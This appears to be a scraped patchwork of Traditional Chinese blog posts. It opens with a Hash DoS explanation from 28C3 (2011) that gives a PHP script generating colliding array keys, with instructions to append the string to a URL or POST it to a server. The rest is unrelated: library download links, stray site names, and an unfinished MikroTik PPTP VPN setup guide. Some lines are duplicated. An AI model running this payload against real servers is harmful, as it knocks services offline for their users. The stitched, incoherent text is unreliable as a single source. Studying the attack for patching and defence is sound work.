以下為 Hash DoS 攻擊方式說明,只供 學術研究 及 測試使用,請勿用於攻擊他人伺服器,否則一切責任由攻擊者負責!
只需利用此字串,帶入到網址後方即可!或者使用POST的方式發送。
例如: http://xxxx.com.tw?index.aspx?3QBZJK5ZX=&NEUQ7BWAV6=&6902D0YP6J=...
以下為 Hash DoS 攻擊方式說明,只供 學術研究 及 測試使用,請勿用於攻擊他人伺服器,否則一切責任由攻擊者負責!
只需要利用 PHP 產生 Hash 字串即可,程式碼如下:
<?php
$data = '';
$size = pow(2, 15);
for ($key=0, $max=($size-1)*$size; $key<=$max; $key+=$size)
{
$data .= '&array[' . $key . ']=0';
}
echo ltrim($data,'&');
?>產生的字串如檔案:dosstr
只需利用此字串,帶入到網址後方即可!或者使用POST的方式發送。
2011 年終的 28C3 最有新聞性的演講大概就屬 Hash DoS 攻擊,相關連結:
- Effective Denial of Service attacks against web application platforms
- n.runs-SA-2011.004 - web programming languages and platforms - DoS through hash table
- Effective DoS attacks against Web Application Plattforms
目前發現所有 Web 程式都會受到 Hash table 漏洞影響,微軟也緊急出OOB patch。
這個攻擊原理其實在2003 的usenix security 就提出只是當時只有沒有引起太大的注意。
簡單說就是產生大量的 Hash collision 的 key,就會塞到同一個 bucket,讓 hash搜尋時間變成 O(n^2),很快就可以把 CPU 資源吃完。
官方網站下載:http://www.eyecon.ro/datepicker/
本地下載:datepicker
本篇利用 csid3lib 讀取 MP3 中的 ID3 檔案資訊。
官方網站下載:http://sourceforge.net/projects/csid3lib/
本地下載:csid3lib-v0.5-src
本篇利用 ExifMetadata 讀取 圖片 內的 EXIF 資訊。
本地下載:ExifMetadata
本篇利用 ExifLibrary v0.16 讀取 圖片 內的 EXIF 資訊。
官方網站下載:http://code.google.com/p/exiflibrary/
本地下載:ExifLibrary_v0.16
ModMan
The Fudge House of Edinburgh
Pulpfingers
Kay in t Veen Photography
虛擬私人網路,亦稱為虛擬專用網路(英文︰Virtual Private Network,簡稱VPN),是一種常用於連接中、大型企業或團體與團體間的私人網路的通訊方法。
虛擬私人網路的訊息透過公用的網路架構(例如:網際網路)來傳送內聯網的網路訊息。
※簡單來說 PPTP (VPN) 就是讓你可以從外部網路,連線回 公司 或 家中 使用內部網路資源。
首先您的 RouterOS 的 WAN Port 必須已經設定完成,可正常連線上網,設定方式可參考之前的文章。
ADSL用戶 (PPPoE):http://blog.cscworm.net/?p=1853
Cable用戶 (DHCP Client):http://blog.cscworm.net/?p=1821
固定IP (Static IP):http://blog.cscworm.net/?p=1843
開始設定:
設定 PPTP Server 的 IP 分配範圍:
使用 Winbox 登入 Router OS ,選擇選項 IP > Pool:
